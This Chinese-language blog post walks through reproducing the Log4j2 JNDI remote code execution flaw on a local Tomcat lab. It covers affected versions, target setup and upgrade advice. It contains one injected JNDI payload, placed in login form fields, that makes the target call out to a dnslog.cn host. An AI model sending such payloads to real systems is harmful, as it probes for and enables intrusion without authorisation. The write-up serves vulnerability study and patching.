log4j2漏洞复现漏洞描述影响版本漏洞复现修复建议

漏洞描述

Apache Log4j2是一款Java日志框架，是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。
Apache Log4j2组件存在远程代码执行漏洞，漏洞利用无需特殊配置，攻击者可直接构造恶意请求，触发远程代码执行。

影响版本

目前受影响的Apache Log4j2版本：

2.0 ≤ Apache Log4j <= 2.14.1

已知受影响应用及组件：
Hadoop Hive
Apache Solr
Apache Struts2
Apache Druid
Apache Log4j SLF4J Binding
spring-boot-strater-log4j2
JBoss Logging 3
…
更多组件可参考如下链接：

https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core/usages?p=1

漏洞复现

环境准备

感谢weil大佬给我的源码包。
感谢兰秋一大佬给我的xampp。
百度网盘链接：复现环境
提取码：1234

靶场搭建

1、下载xampp，一直next下一步。

2、安装完成显示如下。

3、解压源码.zip，找到xampp安装tomcat的位置，进入webapps，将原来的ROOT更改名称，我这里更改为ROOT123，然后将源码包中的ROOT.war复制到webapps中。

4、启动xampp中的tomcat，环境搭建成功，这里默认开启8080端口。

执行命令

1、登录页面输入账密抓包。

2、构造payload，请求dnslog。

$%7bjndi:dns://sqkl4w.dnslog.cn/test%7d

username参数：
password参数：

修复建议

目前官方已发布Apache Log4j 2.15.1-rc1（测试版）及Apache Log4j 2.15.0（稳定版）修复该漏洞，建议受影响用户可将Apache Log4j所有相关应用到以上版本。
下载链接：
https://github.com/apache/logging-log4j2/releases/tag/log4j-2.15.1-rc1
https://logging.apache.org/log4j/2.x/download.html

声明：以上漏洞复现所使用的环境工具均为测试环境使用，产生的一切法律后果自行承担。

最后

以上就是凶狠天空为你收集整理的log4j2漏洞复现漏洞描述影响版本漏洞复现修复建议的全部内容，希望文章能够帮你解决log4j2漏洞复现漏洞描述影响版本漏洞复现修复建议所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错，欢迎将靠谱客网站推荐给程序员好友。